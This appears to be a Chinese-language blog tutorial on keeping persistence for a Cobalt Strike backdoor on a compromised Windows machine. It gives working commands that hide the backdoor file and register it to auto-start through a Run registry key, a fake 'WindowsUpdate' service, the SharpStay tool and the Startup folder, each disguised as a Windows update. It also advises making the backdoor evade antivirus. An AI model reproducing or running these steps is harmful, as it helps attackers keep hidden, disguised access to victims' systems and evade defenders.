cobaltstrike权限维持
1.注册表启动
注意:优先用这种方式来进行权限维持
task.exe是CS生成的后门文件,这里后门文件可以对其做免杀
隐藏文件
shell attrib C:\Windows\task.exe +s +h
data:image/s3,"s3://crabby-images/e5534/e55340b785e144a1e1d524495c7d5473255cc95e" alt=""
注册表启动后门文件
shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "C:\Windows\task.exe" /f
data:image/s3,"s3://crabby-images/99231/992316c0f4f9559a38b1eed7a0d0ff4c2b35bc6a" alt=""
data:image/s3,"s3://crabby-images/a74be/a74be8f92d4c6cd00d544efb24cf218d333a4717" alt=""
2.windows服务自动启动
隐藏文件
shell attrib C:\Windows\task.exe +s +h
服务自动启动执行后门文件
shell sc create "WindowsUpdate" binpath= "cmd /c start C:\Windows\task.exe"
shell sc config "WindowsUpdate" start= auto
shell net start "WindowsUpdate"
data:image/s3,"s3://crabby-images/fb666/fb666dc742712e7a208143d3158c48806b7aef85" alt=""
data:image/s3,"s3://crabby-images/a0fc4/a0fc4620a9b6a5b35d61797f927fce567efb8d70" alt=""
或者
data:image/s3,"s3://crabby-images/e2107/e2107ccbc2e096df52785e9747474219adfdb881" alt=""
data:image/s3,"s3://crabby-images/3e4fb/3e4fbfc2c6507cb7a7be6ee260da5f6a01f6f3df" alt=""
data:image/s3,"s3://crabby-images/09ac8/09ac8fc378787caf8eb986bb316cdc4eb8ff0906" alt=""
3.SharpStay.exe 自动化任务启动
SharpStay.exe action=CreateService servicename=Debug command="C:\Windows\task.exe"
data:image/s3,"s3://crabby-images/eb37d/eb37d69f2db75f7f87701221e4acdc4a7fe96a70" alt=""
data:image/s3,"s3://crabby-images/b60ce/b60cee7d0f5e76d4d910c8eae80a8775fb64bfca" alt=""
4.自动启动服务目录(win7系统才有效)
shell copy "C:\Windows\task.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" /y
或者
copy " C:\Windows\task.exe" "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" /y
shell attrib "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" +s +h
data:image/s3,"s3://crabby-images/38b02/38b023df25d82099a2065471111cd921164fdfa9" alt=""